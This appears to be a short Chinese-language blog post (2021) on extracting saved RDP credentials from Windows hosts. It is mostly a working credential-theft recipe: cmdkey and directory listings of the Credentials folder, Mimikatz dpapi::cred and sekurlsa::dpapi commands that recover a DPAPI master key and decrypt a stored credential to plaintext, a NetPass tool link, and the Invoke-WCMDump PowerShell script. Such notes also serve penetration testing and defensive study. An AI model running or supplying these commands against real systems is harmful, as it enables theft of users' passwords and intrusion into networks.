RDP登录凭据获取

当用户在RDP登录时点击了保存登录凭据，获取凭据可以使用以下几种方法

#查看mstsc的连接记录
cmdkey /list
#查找本地的Credentials
dir /a %userprofile%\appdata\local\microsoft\credentials\*

Mimikatz

存在的话，使用Mimikatz，执行以下命令，记录guidMasterKey值

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\administrator.TEST\appdata\local\microsoft\credentials\AFCD2DF5CFF3011965E57ABB0ED64240"

接着，再执行如下命令，找到guidMasterKey对应的MasterKey

mimikatz.exe "privilege::debug" "sekurlsa::dpapi"

执行以下命令，使用上面记录的MasterKey解密指定的凭据： AFCD2DF5CFF3011965E57ABB0ED64240

mimikatz.exe "dpapi::cred /in:C:\Users\administrator.TEST\appdata\local\microsoft\credentials\AFCD2DF5CFF3011965E57ABB0ED64240 /masterkey:3886e1d7a926c6267058d67385cb4e985b3aa0d3f635eebb5fe83ce8d0457d4493e8694f60d9f19a96631c89411ed5477254be5cd5d90c5ed5d36bd4c3271615"

如上图，已解密出明文。

NetPass抓取

工具下载地址：https://www.nirsoft.net/utils/network_password_recovery.html

PowerShelll脚本抓取

Import-Module .\Invoke-WCMDump.ps1
Invoke-WCMDump

参考链接

posted @ 2021-08-27 10:42 tomyyyyy 阅读(388) 评论(0) 编辑收藏举报

刷新页面返回顶部

tomyyyyy

RDP登录凭据获取

RDP登录凭据获取

NetPass抓取

PowerShelll脚本抓取

公告